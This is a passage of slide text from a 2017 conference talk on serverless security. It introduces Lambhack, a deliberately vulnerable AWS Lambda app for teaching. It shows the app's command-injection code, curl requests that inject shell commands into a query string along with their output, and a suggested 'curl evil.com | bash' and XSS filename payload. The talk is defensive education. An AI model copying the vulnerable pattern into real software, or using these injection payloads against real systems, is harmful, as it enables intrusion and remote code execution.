‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
![Page 100: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/100.jpg)
Velocity San Jose 2017 @WICKETT
ATTACK DETECTION
![Page 101: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/101.jpg)
Velocity San Jose 2017 @WICKETT
DOES APPLICATION SECURITY STILL MATTER?
![Page 102: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/102.jpg)
Velocity San Jose 2017 @WICKETThttps://medium.com/
@PaulDJohnston/security-and-serverless-ec52817385c4
![Page 103: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/103.jpg)
Velocity San Jose 2017 @WICKETT
![Page 104: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/104.jpg)
Velocity San Jose 2017 @WICKETT
APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL
RELEVANT 15 YEARS LATER!
![Page 105: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/105.jpg)
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
![Page 106: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/106.jpg)
Velocity San Jose 2017 @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
![Page 107: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/107.jpg)
Velocity San Jose 2017 @WICKETT
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off
what you see here.
![Page 108: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/108.jpg)
Velocity San Jose 2017 @WICKETT
![Page 109: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/109.jpg)
Velocity San Jose 2017 @WICKETT
BAD CODE IS BAD CODEEVEN IN SERVERLESS…
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)
![Page 110: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/110.jpg)
Velocity San Jose 2017 @WICKETT
With command execution available to us in
lambhack, we can poke around the container a bit
![Page 111: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/111.jpg)
Velocity San Jose 2017 @WICKETT
UNAME -A
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
![Page 112: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/112.jpg)
Velocity San Jose 2017 @WICKETT
CAT /PROC/VERSION$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1”
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
![Page 113: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/113.jpg)
Velocity San Jose 2017 @WICKETT
LET’S LOOK IN /TMP
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
![Page 114: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/114.jpg)
Velocity San Jose 2017 @WICKETT
LAMBDA REUSE IN ACTION!
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
![Page 115: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/115.jpg)
Velocity San Jose 2017 @WICKETT
WHICH CURL
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
![Page 116: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/116.jpg)
Velocity San Jose 2017 @WICKETT
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
![Page 117: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/117.jpg)
Velocity San Jose 2017 @WICKETT
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
![Page 118: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/118.jpg)
Velocity San Jose 2017 @WICKETT
APPLICATION SECURITY IS STILL RELEVANT
![Page 119: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/119.jpg)
Velocity San Jose 2017 @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec
‣ XSS
‣ Injection Attacks
‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
![Page 120: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/120.jpg)
Velocity San Jose 2017 @WICKETT
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
![Page 121: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/121.jpg)
Velocity San Jose 2017 @WICKETT
Development in serverless is easier than ever, attracting new developers to web development, as a result, application security
will see a rise.
FINAL THOUGHT
![Page 122: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/122.jpg)
Velocity San Jose 2017 @WICKETT
![Page 123: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/123.jpg)
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
![Page 124: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/124.jpg)
Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
![Page 125: Serverless Security: A pragmatic primer for builders and defenders](https://reader037.vdocuments.site/reader037/viewer/2022102316/5a6479207f8b9a31568b46eb/html5/thumbnails/125.jpg)
Velocity San Jose 2017 @WICKETT
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]